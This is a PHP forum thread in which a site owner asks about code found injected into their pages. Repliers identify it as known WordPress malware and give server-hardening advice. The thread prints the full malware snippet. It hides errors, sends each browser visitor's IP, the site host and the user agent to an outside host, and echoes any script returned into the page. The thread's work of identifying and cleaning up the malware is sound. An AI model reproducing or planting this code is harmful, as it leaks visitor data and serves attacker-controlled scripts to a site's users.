Jump to content

what is this code?


lingo5
Go to solution Solved by Jacques1,

Recommended Posts

<?php
#bbce85#
error_reporting(0); @ini_set('display_errors',0); $wp_jgm13 = @$_SERVER['HTTP_USER_AGENT']; if (( preg_match ('/Gecko|MSIE/i', $wp_jgm13) && !preg_match ('/bot/i', $wp_jgm13))){
$wp_jgm0913="http://"."web"."https".".com/"."web/?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_jgm13);
if (function_exists('curl_init') && function_exists('curl_exec')) {$ch = curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_jgm0913); curl_setopt ($ch, CURLOPT_TIMEOUT, 20); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$wp_13jgm = curl_exec ($ch); curl_close($ch);} elseif (function_exists('file_get_contents') && @ini_get('allow_url_fopen')) {$wp_13jgm = @file_get_contents($wp_jgm0913);}
elseif (function_exists('fopen') && function_exists('stream_get_contents')) {$wp_13jgm=@stream_get_contents(@fopen($wp_jgm0913, "r"));}}
if (substr($wp_13jgm,1,3) === 'scr'){ echo $wp_13jgm; }
#/bbce85#
?>

I've found this piece of code in some of my pages and I didn't put it there?...please help me identify what it is. Thanks.

 

Link to comment
Share on other sites

If you didn't put the code into the scripts, then it's malware. This particular snippet seems to be known Wordpress malware which loads content from an external URL and embeds it into your site.

 

But the details don't matter. Take your site down right now, grab somebody who understands system administration and carefully reinstall everything from the ground up, this time with proper security. There's something very, very wrong with your server when people can change your PHP scripts.

  • Like 2
Link to comment
Share on other sites

There may certainly be a vulnerability in your code, but the real issue is that your PHP scripts are writable. An application must never be able to change arbitrary files on your server, no matter how broken it is.

 

So before you jump to Wordpress-specific fixes, you should take care of basic server security:

  • Are you using a plaintext protocol like FTP? Then you need to switch to SFTP or SCP.
  • Do you use password-based authentication? Then generate a new long, random password with a password manager like KeePass. Also consider switching to public-key authentication.
  • Check your file permissions and reduce them to the absolute minimum. PHP scripts only have to be readable (by the webserver), not writable and not executable.
  • Check the security of your database. Never use the database superuser for applications, and make sure you have a strong password.

Those simple steps will prevent a lot of attacks. We won't be able to make Wordpress (or similar software) perfectly secure, but we can definitely ensure that an application vulnerability won't compromise our entire server.

  • Like 1
Link to comment
Share on other sites

There may certainly be a vulnerability in your code, but the real issue is that your PHP scripts are writable. An application must never be able to change arbitrary files on your server, no matter how broken it is.

If there is a problem in the code that: lets you upload malicious files instead of say images, has LFI/RFI vulnerabilities, has eval(), etc, then you basically have access to the server itself. Even if Apache is unable to write to any other file except one vulnerable one, you could still potentially exploit something like a privilege escalation vulnerability on the server.

 

There's valid reasons to allow the application to write PHP files. Caching is a big part of that, as well as configuration management, etc. A vulnerability in systems like that would be bad news.

Link to comment
Share on other sites

If there is a problem in the code that: lets you upload malicious files instead of say images, has LFI/RFI vulnerabilities, has eval(), etc, then you basically have access to the server itself. Even if Apache is unable to write to any other file except one vulnerable one, you could still potentially exploit something like a privilege escalation vulnerability on the server.

 

That's why every programmer/administrator in their right mind uses a defense-in-depth approach: You need to take care of the OS and the webserver and the applications and the database system etc.

 

Keeping your Wordpress up-to-date is a good start, but it's not enough.

 

 

 

There's valid reasons to allow the application to write PHP files. Caching is a big part of that, as well as configuration management, etc.

 

I don't care if there are valid reasons for giving Wordpress write access to PHP files. Considering the security record of this software, I wouldn't do it, especially when it's a private website which can easily be maintained by hand.

 

It's a different story for professional applications (which this thread isn't about). But even then you need a damn good reason for relaxing the read-only policy.

Link to comment
Share on other sites

That's why every programmer/administrator in their right mind uses a defense-in-depth approach: You need to take care of the OS and the webserver and the applications and the database system etc.

Every programmer/administrator in their right mind (hopefully) isn't using Wordpress. :P

 

You can (and should) take the proper precautions on the server-side, but if you have a vulnerability in the code that lets you drop to a shell, there's a good chance you're going to get pwned.

 

I don't care if there are valid reasons for giving Wordpress write access to PHP files. Considering the security record of this software, I wouldn't do it, especially when it's a private website which can easily be maintained by hand.

True, I guess I wasn't talking about Wordpress specifically anymore.

Link to comment
Share on other sites

You can (and should) take the proper precautions on the server-side, but if you have a vulnerability in the code that lets you drop to a shell, there's a good chance you're going to get pwned.

 

No doubt about that.

 

So in case my previous reply wasn't clear enough: Both the server configuration and Wordpress need to be fixed. This includes all plug-ins, because a lot of vulnerabilities are in fact introduced through poorly written third-party additions.

Edited by Jacques1
Link to comment
Share on other sites

  • Solution

That's a bit strange, but there's no rule saying that WP malware can only infect WP-based applications.

 

Anyway, all of the above still applies. If you've written the code yourself, replace “Update your application” with “Learn the basics of PHP security and fix your code accordingly”.

Link to comment
Share on other sites

This thread is more than a year old. Please don't revive it unless you have something important to add.

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Restore formatting

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
×
  • Create New...

Important Information

We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.